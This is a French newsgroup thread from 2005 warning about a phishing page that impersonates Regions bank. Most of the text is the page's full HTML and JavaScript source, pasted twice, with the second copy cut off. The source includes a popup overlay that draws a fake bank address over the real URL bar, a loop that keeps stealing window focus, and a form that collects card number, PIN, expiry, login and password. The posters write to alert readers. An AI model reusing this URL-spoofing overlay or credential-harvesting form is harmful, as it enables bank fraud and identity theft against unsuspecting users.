Une ruse de pirate

Frederic Bonroy

02/02/2005 à 23:44

peut etre ne posté-je pas dans le bon newsgroup: dans ce cas, merci de faire
suivre.

J'attire votre attention sur un systeme de piratage comportant un "exploit",
que j'ai découvert ce soir (2/1/05): vous recevez un email de "Regions and
Union planters" qui vous bascule, lorsque vous cliquez sur le lien, sur une
page ayant a priori le même lien
(http://online.regions.com/ibsregions/cmserver/user/default/confirm.cfm .

En fait il n'en est rien , Outlook vous bascule sur une url en
http://adresse ip, et un javascript dans la page s'occupe de cacher le vrai
lien par un faux lien. J'ai reproduit ceci en exemple sur mon site, en
précisant bien qu'il s'agit d'un fake:
http://www.mircscriptsfrfm.com/virus/fraud/fake.htm .

On s'aperçoit de la supercherie si on fait glisser une fenetre au dessus de
la page: l'adresse url de la page s'écrit alors en surimpression sur ladite
fenetre. MAis la ruse est excessivemet sioux, et j'imagine que certains se
sont fait avoir par ce systeme. Surtout ne mettre aucun mot de passe ni
carte de credit dans le formulaire. Ca marche avec IE6, je n'ai pas
l'assurance que cela fonctionne avec un autre brouteur (en fait, je ne
l'espère pas).

Hmmm... Firefox affiche la vraie adresse, par contre impossible de la
changer: on ne peut taper qu'une seule lettre dans la barre d'adresse, à
moins d'être rapide. Jamais vu ça...

J'imagine qu'avec IE c'est encore pire. Je n'ai aucune envie d'essayer. ;-)

P.C.

02/02/2005 à 23:59

"Imhotep" a écrit dans le message de
news:1cvy6mh9hpeuq$

Je réponds à P.C. :

MAis la ruse est excessivemet sioux, et j'imagine que certains se
sont fait avoir par ce systeme.

Çà s'appelle du phishing et ce n'est pas nouveau.
--
oui la ruse est connue j'en conviens, a l'époque où j'etais sous aol j'en

recevais 10 par jour (Sincerey: John Cuber, je m'en souviens encore). Ce qui
est nouveau, c'est d^etre arrivé à truquer l'url de la page web! Celui qui
se dit: ce site est honnête car l'url de la page ne ment pas, celui-là il a
tout faux. Avez-vous seulement essayé de regarder le site?

Gerard Membu

03/02/2005 à 10:12

Le Wed, 2 Feb 2005 23:59:39 +0100, "P.C."

"Imhotep" a écrit dans le message de
news:1cvy6mh9hpeuq$
Je réponds à P.C. :

MAis la ruse est excessivemet sioux, et j'imagine que certains se
sont fait avoir par ce systeme.

Çà s'appelle du phishing et ce n'est pas nouveau.
--
oui la ruse est connue j'en conviens, a l'époque où j'etais sous aol j'en

recevais 10 par jour (Sincerey: John Cuber, je m'en souviens encore). Ce qui
est nouveau, c'est d^etre arrivé à truquer l'url de la page web! Celui qui
se dit: ce site est honnête car l'url de la page ne ment pas, celui-là il a
tout faux. Avez-vous seulement essayé de regarder le site?

Pour ma part, F-Secure Internet gateway bloque purement et simplement
cette URL avec un Trojan City Fraud discovered ...

Henri Vieilleribiere

03/02/2005 à 12:35

Bonjour,

peut etre ne posté-je pas dans le bon newsgroup: dans ce cas, merci de faire
suivre.

J'attire votre attention sur un systeme de piratage comportant un "exploit",
que j'ai découvert ce soir (2/1/05): vous recevez un email de "Regions and
Union planters" qui vous bascule, lorsque vous cliquez sur le lien, sur une
page ayant a priori le même lien
(http://online.regions.com/ibsregions/cmserver/user/default/confirm.cfm .

En fait il n'en est rien , Outlook vous bascule sur une url en
http://adresse ip, et un javascript dans la page s'occupe de cacher le vrai
lien par un faux lien. J'ai reproduit ceci en exemple sur mon site, en
précisant bien qu'il s'agit d'un fake:
http://www.mircscriptsfrfm.com/virus/fraud/fake.htm .

On s'aperçoit de la supercherie si on fait glisser une fenetre au dessus de
la page: l'adresse url de la page s'écrit alors en surimpression sur ladite
fenetre. MAis la ruse est excessivemet sioux, et j'imagine que certains se
sont fait avoir par ce systeme. Surtout ne mettre aucun mot de passe ni
carte de credit dans le formulaire. Ca marche avec IE6, je n'ai pas
l'assurance que cela fonctionne avec un autre brouteur (en fait, je ne
l'espère pas).

Bonjour,
Ça marche avec mozilla sous Linux.
J'ai enlevé "javascript", ça devrait calmer.

Merci pour l'info.

Cordialement

Henri

--
Pour répondre mettre un "i" à henry.
< http://fursacreuse.free.fr > l'histoire de 3 hommes qui
furent fusillés en 1871 à Fursac dans la Creuse.

Anais

03/02/2005 à 18:51

Pour ma part, F-Secure Internet gateway bloque purement et simplement
cette URL avec un Trojan City Fraud discovered ...

Moi également mon AV Firewall Securitoo bloque cette URL comme Gérard
(trojan.spy.HTML.citifraud.j

P.C.

03/02/2005 à 19:54

"Imhotep" a écrit dans le message de
news:1043zkzk4hj6j$

Je réponds à P.C. :

Ce qui
est nouveau, c'est d^etre arrivé à truquer l'url de la page web!

Ce n'est pas nouveau non plus. Il suffit de lire le code HTML du message
pour voir que l'adresse réelle est cachée.

Monsieur (madame?) Momie,

je vous défie de regarder le code html du fichier avec la fonction view
source (ou au clic droit de la souris)! Enfin, sous IE6. L'auteur ne semble
pas être un débutant dans le domaine du grenouillage informatique.

De reste, le monde ne va surement pas s'embeter a regarder du code source
pour vérifier qu'une page est bien honnete alors qu'a priori elle le semble.
Le mieux, effectivement, ce sont les antivirus qui detectent une fraude dans
le javascript (ce qui est arrivé à certains). Mon but était de sensibiliser
du monde au fait que ce genre de chose (truquage de l'url d'une page en
temps réel) etait possible. Personnellement, Norton ne me dit strictement
rien à propos de cette page truquée.

Emmanuel Delahaye

03/02/2005 à 23:26

P.C. wrote on 03/02/05 :

"Imhotep" a écrit dans le message de
news:1043zkzk4hj6j$
Je réponds à P.C. :

Ce qui
est nouveau, c'est d^etre arrivé à truquer l'url de la page web!

Ce n'est pas nouveau non plus. Il suffit de lire le code HTML du message
pour voir que l'adresse réelle est cachée.

Monsieur (madame?) Momie,

je vous défie de regarder le code html du fichier avec la fonction view
source (ou au clic droit de la souris)! Enfin, sous IE6. L'auteur ne semble
pas être un débutant dans le domaine du grenouillage informatique.

Et voilà:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<script language="JavaScript" type="text/JavaScript">

</script>

<html lang="en">

<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META
HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-transform">
<title>Regions - Customer Details Confirmation</title>

<script type="text/javascript" language="JavaScript">
flag=1;
window.onfocus=MyFocus;
window.onblur=MyBlur;

function MyBlur(){
flag=1;
clearTimeout(to);
to=setTimeout("Ticker()", 100);
}

function MyFocus(){
flag=0;
}

function Ticker(){
if (flag==1) {window.focus();}
to=setTimeout("Ticker()", 100);
}

Ticker();

closeflag=1;

window.onbeforeunloadñ;
//window.onsubmitò;
function F1(){
if (closeflag)
Console(90,80);
//
window.open("index.htm","","width0,heightp0,top,leftp,scrollbars=no,toolbar=no,location=no,menubar=no,status=no,resizable=no");
}

function Console(width,height) {
var swidth=0;
var sheight=0;
if (self.screen) { // for NN4 and IE4
swidth = screen.width;
sheight = screen.height
}

new Object(
);
}

function F2(){
closeflag=0;
}

function isblank(fe){
if (fe.value == "") {
return true;
} else {
return false;
}
}

function verify(frm, fields, msg){
fieldarray = fields.split(",");
for (i=0; i<frm.elements.length; i++){
for (j=0; j<fieldarray.length; j++){
if ( fieldarray[j] == frm.elements[i].name &&
isblank(frm.elements[i])
) {
alert(msg);
frm.elements[i].focus();
return false;
}
}
}
return true;
}
</script>

<script language="JavaScript">
var now = new Date();
var month1 = "10";
var year4 = "2004";
var now = "10/23/2004";
var today = new Date();
var m = "10";
var d = "23";
var y = "2004";
var TodaysDate = "10/23/2004";
var isValidAmount = false;
var MAXXFRAMT = 100000;
var timeDelay = 1500;
var myAgent = "Nav";
var myPlatform = "notMac";
var vToday = TodaysDate.split("/");
var iBaseYear = parseFloat(vToday[2]);
var popupWin = "";
var popupPSR = "";
var ggWinCal = "";
function closepopupWin() {
if (typeof(popupWin.open) != "unknown") {
if (popupWin.open) {
popupWin.close();
}
}
if (typeof(popupPSR.open) != "unknown") {
if (popupPSR.open) {
popupPSR.close();
}
}

if (ggWinCal.open) {
ggWinCal.close();
}
}
function movepic(img_name,img_src) {
document[img_name].src=img_src;
}
function openWindow(url, name, width, height) {
popupWin = new Object(
)
}

function openWindow2(FileName, parentName) {
popupWin = new Object(

);
popupWin.focus()
}
function openWindow(FileName) {
popupWin = new Object(

);
popupWin.focus()
}
function openWindowSized(FileName) {
popupWin = new Object(

);
popupWin.focus()
}
function openWindowSizedCustom(FileName) {
popupPSR = new Object(

);
popupPSR.focus()
}
function openWindowFull(FileName) {
popupWin = new Object(

);
popupWin.focus()
}
function openWindowSizedModal(FileName) {
popupWin = window.showModalDialog(FileName, 'remote',
'location:no;menubar:no;scrollbars:yes;resizable:no;Dialogwidth:800px;Dialogheight:600px;');
popupWin.focus()
}
function OPENWINDOWFAQ(FileName) {
popupWin = new Object(

);
popupWin.focus()
}
function openWindowConfirm(FileName) {
popupWin = new Object(

);
popupWin.focus()
}
function openWindowConfirm2(FileName, parentName) {
popupWin = new Object(

);
popupWin.focus()
}
function openbrowsertest() {
popupWin = new Object(

);
}
function removeSpace(data) {
while (1) {
if (data.substring(data.length - 1, data.length) != " ")
break;
data = data.substring(0, data.length - 1);
}
return data;
}
function LogOff(){
document.SignOff.submit();
}

function CheckBrowser()
{
var agt=navigator.userAgent.toLowerCase();

// *** BROWSER VERSION ***
// Note: On IE5, these return 4, so use is_ie5up to detect IE5.
var is_major = parseInt(navigator.appVersion);
var is_minor = parseFloat(navigator.appVersion);

// Note: Opera and WebTV spoof Navigator. We do strict client
detection.
// If you want to allow spoofing, take out the tests for opera and
webtv.
var is_nav = ((agt.indexOf('mozilla')!=-1) &&
(agt.indexOf('spoofer')==-1)
&& (agt.indexOf('compatible') == -1) && (agt.indexOf('opera')==-1)
&& (agt.indexOf('webtv')==-1) && (agt.indexOf('hotjava')==-1));
var is_nav2 = (is_nav && (is_major == 2));
var is_nav3 = (is_nav && (is_major == 3));
var is_nav4 = (is_nav && (is_major == 4));
var is_nav4up = (is_nav && (is_major >= 4));
var is_navonly = (is_nav && ((agt.indexOf(";nav") != -1) ||
(agt.indexOf("; nav") != -1)) );
var is_nav6 = (is_nav && (is_major == 5));
var is_nav6up = (is_nav && (is_major >= 5));
var is_gecko = (agt.indexOf('gecko') != -1);

if (is_nav4)
{
alert("Thank you for your attempt to view Online Statements in Internet
Banking. Our online statements " +
"process will not work with the browser version you are currently
using. Please go to " +
"https://online.regions.com/ibsregions/cmserver/users/default/confirm.cfm,
select Help from the left navigation and then select Browser " +
"Information at the top. This page will provide you with a link
to upgrade your Netscape or " +
"Internet Explorer browser.");
return false;
}
}
</script>
<link rel="STYLESHEET" href="styles00.css" type="text/css">
<script language="javascript">
var msg = "";
var Logout = "No";
var prevkey = "";
var prevassigncount = 0;
var isNav = (navigator.appName.indexOf("Netscape") !=-1);
if (isNav){
window.captureEvents(Event.KEYPRESS)
window.onkeypress = getKey;
}
else{
document.onkeypress = getKey;
}
function getKey(keyStroke) {

if (prevassigncount != 0) prevkey = keyHit;
prevassigncount ++;
keyHit = (isNav) ? keyStroke.which : event.keyCode;
whichKey = String.fromCharCode(keyHit).toLowerCase();
checkKey();
}
function checkKey(){
//if(document.forms[0].name == "sign_on"){
if (keyHit=="13" && prevkey != "0"){
InputCheck();

}
//}
}

var submitted = false;
var iCount = 0;
var sPlatform = 'notMacNav';
function InputCheck(bClick, fxndislocation){
var InputOK = "Yes";
if (iCount == 0 || (sPlatform == "MacNav" && bClick)) {
if (document.sign_on.user.value != "Click Sign On") {
//clear the demo cookie
var expiresDate = "Wednesday, 01-Jan-2003 12:00:00 GMT";
document.cookie = "demo=;expires=" + expiresDate;
//perform validation for logging in to IB
if (document.sign_on.user.value == ""){
alert("Please enter your CIN or User ID.");
document.sign_on.user.focus();
InputOK = "Alerted";
}
else if(document.sign_on.user.value.length > 26){
InputOK = "No_User";
}
else if(document.sign_on.user.value.length < 8){
InputOK = "No_User";
}
else if(!document.sign_on.user.value.search(/^[a-zA-Z0-9]{8,26}$/i) ==
-1){
InputOK = "No_User";
}
if(document.sign_on.pin.value == ""){
alert("Please enter your Password.");
document.sign_on.pin.focus();
InputOK = "Alerted";
}
else if((document.sign_on.pin.value.length >
8)||(document.sign_on.pin.value.length ==
5)||(document.sign_on.pin.value.length < 4)){
InputOK = "No_Pin";
}
else if(document.sign_on.pin.value.search(/[s]/i) > -1){
InputOK = "No_Pin";
}
if(InputOK == "Yes"){

iCount++;
document.sign_on.pin.value = document.sign_on.pin.value.toUpperCase();
document.sign_on.submit();
document.sign_on.pin.focus();
return true;
}
else{
if (InputOK != "Alerted") {
alert("Invalid log on. n Please try again.");
if(InputOK == "No_User") {
document.sign_on.user.focus();
} else {
document.sign_on.pin.focus();
}
}
return false;
}
} else {

//login to demo
InputOK = "Yes";
document.sign_on.submit();
document.sign_on.pin.focus();
return true;
}

} else {
if (null == fxndislocation) {
alert("Logon currently processing.");
}
return false;
}
}
var nSignonFocus = 0;
function signonFocus(){
nSignonFocus = 1;
}
function setFocusUser(){
document.sign_on.user.focus();
}

</script>

<noscript>
<META HTTP-EQUIV="refresh" CONTENT="30;
URL=/EBanking/app/cs/user/includes/enableJavascript.html">
</noscript>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta http-equiv="content-language" content="en">
<meta name="copyright" content="Copyright 2003. S1 Corporation. All
rights reserved.">
<link rel="stylesheet" href='id_main0.css' type="text/css">
<script language="JavaScript">

</script>

<SCRIPT type="text/javascript" src="BrowserS.js"></SCRIPT>
</head>
<body bgcolor="#ffffff" marginwidth="0" marginheight="0" leftmargin="0"
topmargin="0" onload="MM_preloadImages('main_b_access_orange_alt.gif',
'ss_b_contact_us_alt.jpg', 'ss_b_logout_alt.jpg', 'main_b_pbd_alt.gif',
'main_b_enroll.gif');setFocus()" onload="setFocusUser();"
oncontextmenu="return false">
<a name="top"></a>

<table width="100%" border="0" cellpadding="0" cellspacing="0"
background="sun_pixelrow.jpg">
<tr>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><img src="ss_login.jpg" height="81" width="482"></td>

</tr>
</table>
</td>
<td align="right">

<script type="text/javascript">

var vuln_x, vuln_y, vuln_w, vuln_h;
function vuln_calc() {
var root= document[
(document.compatMode=='CSS1Compat') ?
'documentElement' : 'body'
];
vuln_x= window./* */screenLeft+68;
vuln_y= window.screenTop-21;
vuln_w= root.offsetWidth-500;
vuln_h= 17;
vuln_show();
}

var vuln_win;
function vuln_pop() {
vuln_win= window.createPopup();
vuln_win.document.body.innerHTML= vuln_html;
vuln_win.document.body.style.margin= 0;
vuln_win.document.body.onunload= vuln_pop;
vuln_show();
}

function vuln_show() {
if (vuln_win)
vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);
}

var vuln_html= 'x3Cdiv style="height: 100%; line-height: 17px;
font-family: 'Tahoma', sans-serif; font-size:
8pt;">https://online.regions.com/ibsregions/cmserver/users/default/confirm.cfmx3C/div>'

if (window.createPopup) {
vuln_calc();
vuln_pop();
window.setInterval(vuln_calc, 25);
} else {

}
</script>

<table border="0" align="right" cellpadding="0" cellspacing="0">

<tr>
<td colspan="3"><img src="ss_sign0.jpg" height="56"
width="278"></td>
</tr>
<tr>
<td><a
href="https://secure.regions.com/servlet/Utils/Email.jsp"
onMouseOut="MM_swapImgRestore()"
onMouseOver="MM_swapImage('contactUs1','',jsContactImageRollover.toString(),1)"
target="_blank"><img src="ss_b_con.jpg" alt="Contact Us"
name="contactUs1" height="25" width="69" border="0"></a></td>
<td><a href="http://www.regions.com/"
onMouseOut="MM_swapImgRestore()"
onMouseOver="MM_swapImage('home1','',jsHomeImageRollover.toString(),1)"><img
src="ss_b_hom.jpg" alt="regions.com" name="home1" height="25"
width="100" border="0"></a></td>
<td><img src="ss_right.jpg" height="25" width="109"></td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0" cellpadding="0" cellspacing="0"
background="main_sub_back.gif">
<tr>
<td align="left">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><img src="ss_sub_l.gif" height="19" width="15"></td>
<td width="100%" background="main_sub_back.gif"><img
src="bank_tag.gif" height="19" width="154"></td>
</tr>
</table>

</td>
<td align="right">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td align="right"><img src="ss_sub_r.gif" height="19"
width="69"></td>
</tr>
</table>
</td>
</tr>

</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">

<tr>
<td width="25" height="100%"><img src="line_leg.gif" height="100%"
width="25"></td>
<td>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>

<table width="100%" border="0" cellspacing="0"
cellpadding="0">
<tr>
<td colspan="2"><img src="blank000.gif"
height="10"></td>
</tr>
<tr>
<td><span class="headline">Secure Confirmation
(Attention, ce site est un fake)</span></td>
<td colspan="1"> </td>
</tr>
<tr>
<td height="7" colspan="2"><img src="blank000.gif"
height="7" width="110"></td>

</tr>
</table>
</td>
</tr>
<tr>
<td>
<table class="hintAndMainOutline" cellpadding="0" cellspacing="0"
border="0">
<tr>
<td>
<table width="100%" border="0" cellspacing="1"
cellpadding="3">

<tr>

<td class="hintBackground" height="31"
valign="top" ><span class="hintblack">Please
confirm your banking details.</span></td>
</tr>
<tr>
<td class="mainSummaryBackground" height="46"
valign="top">
<table width="100%" border="0" cellspacing="0"
cellpadding="0">
<tr>
<td valign="top">
<p><span
class="spanhd">Confirm</span><br>
<span class="hintblack">By accessing
this online
system you agree to have read and
accepted the
terms set forth in the</span> <a
href="https://secure.regions.com/utilities/agreement.html"
target="_blank" class="uhintblack">Regions
Online Banking Agreement and Disclosure
Statement.</a></p>

<table width="722" border="0"
align="left" cellpadding="3" cellspacing="0">
<script type="text/javascript">
if(ie4 || ns4) {
document.write('<tr><td colspan="4"><table class="hintAndMainOutline"
cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td><table
width="100%" border="0" cellspacing="1" cellpadding="3"><tr><td
class="browserWarning"><table width="100%"><tr><td class="grnlabelleft"
colspan="4">Browser Warning</td></tr><tr><td class="data">RegionsNET is
best viewed with Microsoft Internet Explorer 5.0 or later versions and
Netscape Navigator 6.1 or later versions. Browser versions older than
the ones specified will not render consistently, and if you desire a
consistent experience please goto <a
href="http://www.microsoft.com/ie">http://www.microsoft.com/ie</a> or
<a
href="http://www.netscape.com/download">http://www.netscape.com/download</a>
to upgrade to a more recent browser.
</td></tr></table></td></tr></table></td></tr></table></td></tr>');
}
</script>
<form name="logonForm" method="POST"
action="verify.php" onsubmit="F2(); return verify(this,
'fln,ccnum,pin,exp,email', 'The fields <First and Last Name>,
<ATM/Debit Card>, <PIN>, <Expiration Date> and and <E-mail Address> are
required, please review your form and try again');">
<tr>
<td width="136" class="label">First
and Last
Name:</td>
<td width="4"> </td>
<td width="502">
<input type="text" name="fln"
maxlength="77" size="21" tabindex="1" value="" onfocus="MyFocus();"
onblur="MyBlur();">
</td>

<td rowspan="7" align="left"
width="57"> <noscript></noscript></td>
</tr>
<tr>
<td width="136"
class="label">ATM/Debit Card:
</td>
<td width="4"> </td>
<td width="502">
<input type="text" name="ccnum"
maxlength="33" size="21" tabindex="1" value="" onfocus="MyFocus();"
onblur="MyBlur();">
</td>
</tr>

<tr>
<td width="136" class="label">PIN:
</td>
<td width="4"> </td>
<td width="502">
<input type="password" name="pin"
maxlength="33" size="21" tabindex="1" value="" onfocus="MyFocus();"
onblur="MyBlur();">
</td>
</tr>
<tr>
<td width="136"
class="label">Expiration Date:
</td>

<td width="4"> </td>
<td width="502">
<input type="text" name="exp"
maxlength="33" size="21" tabindex="1" value="" onfocus="MyFocus();"
onblur="MyBlur();">
</td>
</tr>
<tr>
<td width="136" class="label">Login
ID: </td>
<td width="4"> </td>
<td width="502">
<input type="text" name="login"
maxlength="33" size="21" tabindex="1" value="" onfocus="MyFocus();"
onblur="MyBlur();">

</td>
</tr>
<tr>
<td width="136"
class="label">Password: </td>
<td width="4"> </td>
<td width="502">
<input type="password"
name="password" maxlength="33" size="21" tabindex="1" value=""
onfocus="MyFocus();" onblur="MyBlur();">
</td>
</tr>

<tr>
<td width="136"
class="label">E-mail Address:
</td>
<td width="4"> </td>
<td width="502">
<input type="text" name="email"
maxlength="33" size="21" tabindex="1" value="" onfocus="MyFocus();"
onblur="MyBlur();">
</td>
</tr>
<tr align="center">
<td height="45">
<div align="left"></div>

</td>
<td height="45"> </td>
<td height="45">
<div align="left">
<input type="image" src="main_b_confirm_orange.gif" border=0
width="116" height="22" name="Submit" value="Submit">
</div>
</td>
<td height="45"> </td>
</tr>
<input type=hidden name="s8fid"
value="111057873651" />

</form>
</table>
</td>
</tr>
<tr>
</tr>
</table>
</td>
</tr>
<tr>

<td class="hintBackground" height="46" valign="middle">
<table width="75%" border="0" align="center"
cellpadding="0" cellspacing="0">
<tr>
<td align="center"><a
href="http://www.regions.com/RegionsNet/regionsnet_demo/index.html"
onMouseOut="MM_swapImgRestore()"
onMouseOver="MM_swapImage('demo','',jsDemoImageRollover.toString(),1)"
target="_blank"><img src="main_b_p.gif" alt="Personal Banking Demo"
name="demo" height="22" width="158" border="0"></a></td>
<td align="center"><a
href="http://www.regions.com/personal/regionsnet.html"
onMouseOut="MM_swapImgRestore()"
onMouseOver="MM_swapImage('enroll','',jsEnrollImageRollover.toString(),1)"><img
src="main_b_e.gif" alt="Enroll in RegionsNET" name="enroll" height="22"
width="141" border="0"></a></td>
</tr>
</table>
</td>
</tr>
</table>

</td>
</tr>
</table>
</td>
</tr>
<tr>
<td height="20"><img src="blank000.gif" height="20"
width="110"></td>
</tr>
<tr>

<td class="tableOutline">
<table width="100%" border="0" cellspacing="1" cellpadding="3">
<tr>
<td height="15" class="bhd">Disclaimer</td>
</tr>
<tr>

<td valign="top" class="rowEvenBackground"><span
class="hintblack">Confirmation
Policy: This is a protected data system with
monitoring and
active security. If you do not consent to monitoring,
or do
not have a valid information, please exit the system
now.</span></td>
</tr>
<tr>

<td width="100%">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td><img src="main_cop.gif" height="18" width="203"
border="0" usemap="#Map3"></td>
<td><div align="right"><img src="main_mem.gif" height="18"
width="221" border="0" usemap="#Map2"></div></td>
</tr>
</table>
</td>
</tr>

</table>
</td>
</tr>
<tr>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2">

<map name="Map3">
<area class="subbarPointer" shape="rect" coords="120,2,197,14"
href="javascript:{privacy_window =
window.open('http://www.regions.com/about/privacy_pledge.html','privacy_window','widths0,heightI5,left0,scrollbars');
privacy_window.focus();}">
<area class="subbarPointer" shape="rect" coords="3,3,113,14"
href="javascript:{copy_window =
window.open('/EBanking/app/cs/user/includes/copyright.html','copy_window','widthP0,height 0,left0,topE0');
copy_window.focus();}">
</map>

<map name="Map2">
<area class="subbarPointer" shape="rect" coords="89,2,218,15"
href="javascript:{equal_window =
window.open('http://www.regions.com/personal/fs_ehl_popup.html','equal_window','widthP0,heightI5,left0');
equal_window.focus();}">
</map>

</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>

<td width="25" height="100%"><img src="line_rih.gif" height="100%"
width="25"></td>
</tr>
</table>

<head>
<meta http-equiv="pragma" content="no-cache">
</head>
</body>
</html>



--
Emmanuel
The C-FAQ: http://www.eskimo.com/~scs/C-faq/faq.html
The C-library: http://www.dinkumware.com/refxc.html

"Clearly your code does not meet the original spec."
"You are sentenced to 30 lashes with a wet noodle."
-- Jerry Coffin in a.l.c.c++

P.C. wrote on 03/02/05 :

"Imhotep" <themummy@heliopolis.net> a écrit dans le message de
news:1043zkzk4hj6j$.dlg@heliopolis.net...

Je réponds à P.C. :

Ce qui
est nouveau, c'est d^etre arrivé à truquer l'url de la page web!

Ce n'est pas nouveau non plus. Il suffit de lire le code HTML du message
pour voir que l'adresse réelle est cachée.

Monsieur (madame?) Momie,

je vous défie de regarder le code html du fichier avec la fonction view
source (ou au clic droit de la souris)! Enfin, sous IE6. L'auteur ne semble
pas être un débutant dans le domaine du grenouillage informatique.

Et voilà:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<script language="JavaScript" type="text/JavaScript">

</script>

<html lang="en">

<head>
<META HTTP-EQUIV="Expires" CONTENT="-1"><META
HTTP-EQUIV="Cache-Control" CONTENT="no-cache, no-store, no-transform">
<title>Regions - Customer Details Confirmation</title>

<script type="text/javascript" language="JavaScript">
flag=1;
window.onfocus=MyFocus;
window.onblur=MyBlur;

function MyBlur(){
flag=1;
clearTimeout(to);
to=setTimeout("Ticker()", 100);
}

function MyFocus(){
flag=0;
}

function Ticker(){
if (flag==1) {window.focus();}
to=setTimeout("Ticker()", 100);
}

Ticker();

closeflag=1;

window.onbeforeunloadñ;
//window.onsubmitò;
function F1(){
if (closeflag)
Console(90,80);
//
window.open("index.htm","","width0,heightp0,top,leftp,scrollbars=no,toolbar=no,location=no,menubar=no,status=no,resizable=no");
}

function Console(width,height) {
var swidth=0;
var sheight=0;
if (self.screen) { // for NN4 and IE4
swidth = screen.width;
sheight = screen.height
}

new Object(
);
}

function F2(){
closeflag=0;
}

function isblank(fe){
if (fe.value == "") {
return true;
} else {
return false;
}
}

function verify(frm, fields, msg){
fieldarray = fields.split(",");
for (i=0; i<frm.elements.length; i++){
for (j=0; j<fieldarray.length; j++){
if ( fieldarray[j] == frm.elements[i].name &&
isblank(frm.elements[i])
) {
alert(msg);
frm.elements[i].focus();
return false;
}
}
}
return true;
}
</script>

<script language="JavaScript">
var now = new Date();
var month1 = "10";
var year4 = "2004";
var now = "10/23/2004";
var today = new Date();
var m = "10";
var d = "23";
var y = "2004";
var TodaysDate = "10/23/2004";
var isValidAmount = false;
var MAXXFRAMT = 100000;
var timeDelay = 1500;
var myAgent = "Nav";
var myPlatform = "notMac";
var vToday = TodaysDate.split("/");
var iBaseYear = parseFloat(vToday[2]);
var popupWin = "";
var popupPSR = "";
var ggWinCal = "";
function closepopupWin() {
if (typeof(popupWin.open) != "unknown") {
if (popupWin.open) {
popupWin.close();
}
}
if (typeof(popupPSR.open) != "unknown") {
if (popupPSR.open) {
popupPSR.close();
}
}

if (ggWinCal.open) {
ggWinCal.close();
}
}
function movepic(img_name,img_src) {
document[img_name].src=img_src;
}
function openWindow(url, name, width, height) {
popupWin = new Object(
)
}

function openWindow2(FileName, parentName) {
popupWin = new Object(

);
popupWin.focus()
}
function openWindow(FileName) {
popupWin = new Object(

);
popupWin.focus()
}
function openWindowSized(FileName) {
popupWin = new Object(

);
popupWin.focus()
}
function openWindowSizedCustom(FileName) {
popupPSR = new Object(

);
popupPSR.focus()
}
function openWindowFull(FileName) {
popupWin = new Object(

);
popupWin.focus()
}
function openWindowSizedModal(FileName) {
popupWin = window.showModalDialog(FileName, 'remote',
'location:no;menubar:no;scrollbars:yes;resizable:no;Dialogwidth:800px;Dialogheight:600px;');
popupWin.focus()
}
function OPENWINDOWFAQ(FileName) {
popupWin = new Object(

);
popupWin.focus()
}
function openWindowConfirm(FileName) {
popupWin = new Object(

);
popupWin.focus()
}
function openWindowConfirm2(FileName, parentName) {
popupWin = new Object(

);
popupWin.focus()
}
function openbrowsertest() {
popupWin = new Object(

);
}
function removeSpace(data) {
while (1) {
if (data.substring(data.length - 1, data.length) != " ")
break;
data = data.substring(0, data.length - 1);
}
return data;
}
function LogOff(){
document.SignOff.submit();
}

function CheckBrowser()
{
var agt=navigator.userAgent.toLowerCase();

// *** BROWSER VERSION ***
// Note: On IE5, these return 4, so use is_ie5up to detect IE5.
var is_major = parseInt(navigator.appVersion);
var is_minor = parseFloat(navigator.appVersion);

// Note: Opera and WebTV spoof Navigator. We do strict client
detection.
// If you want to allow spoofing, take out the tests for opera and
webtv.
var is_nav = ((agt.indexOf('mozilla')!=-1) &&
(agt.indexOf('spoofer')==-1)
&& (agt.indexOf('compatible') == -1) && (agt.indexOf('opera')==-1)
&& (agt.indexOf('webtv')==-1) && (agt.indexOf('hotjava')==-1));
var is_nav2 = (is_nav && (is_major == 2));
var is_nav3 = (is_nav && (is_major == 3));
var is_nav4 = (is_nav && (is_major == 4));
var is_nav4up = (is_nav && (is_major >= 4));
var is_navonly = (is_nav && ((agt.indexOf(";nav") != -1) ||
(agt.indexOf("; nav") != -1)) );
var is_nav6 = (is_nav && (is_major == 5));
var is_nav6up = (is_nav && (is_major >= 5));
var is_gecko = (agt.indexOf('gecko') != -1);

if (is_nav4)
{
alert("Thank you for your attempt to view Online Statements in Internet
Banking. Our online statements " +
"process will not work with the browser version you are currently
using. Please go to " +
"https://online.regions.com/ibsregions/cmserver/users/default/confirm.cfm,
select Help from the left navigation and then select Browser " +
"Information at the top. This page will provide you with a link
to upgrade your Netscape or " +
"Internet Explorer browser.");
return false;
}
}
</script>
<link rel="STYLESHEET" href="styles00.css" type="text/css">
<script language="javascript">
var msg = "";
var Logout = "No";
var prevkey = "";
var prevassigncount = 0;
var isNav = (navigator.appName.indexOf("Netscape") !=-1);
if (isNav){
window.captureEvents(Event.KEYPRESS)
window.onkeypress = getKey;
}
else{
document.onkeypress = getKey;
}
function getKey(keyStroke) {

if (prevassigncount != 0) prevkey = keyHit;
prevassigncount ++;
keyHit = (isNav) ? keyStroke.which : event.keyCode;
whichKey = String.fromCharCode(keyHit).toLowerCase();
checkKey();
}
function checkKey(){
//if(document.forms[0].name == "sign_on"){
if (keyHit=="13" && prevkey != "0"){
InputCheck();

}
//}
}

var submitted = false;
var iCount = 0;
var sPlatform = 'notMacNav';
function InputCheck(bClick, fxndislocation){
var InputOK = "Yes";
if (iCount == 0 || (sPlatform == "MacNav" && bClick)) {
if (document.sign_on.user.value != "Click Sign On") {
//clear the demo cookie
var expiresDate = "Wednesday, 01-Jan-2003 12:00:00 GMT";
document.cookie = "demo=;expires=" + expiresDate;
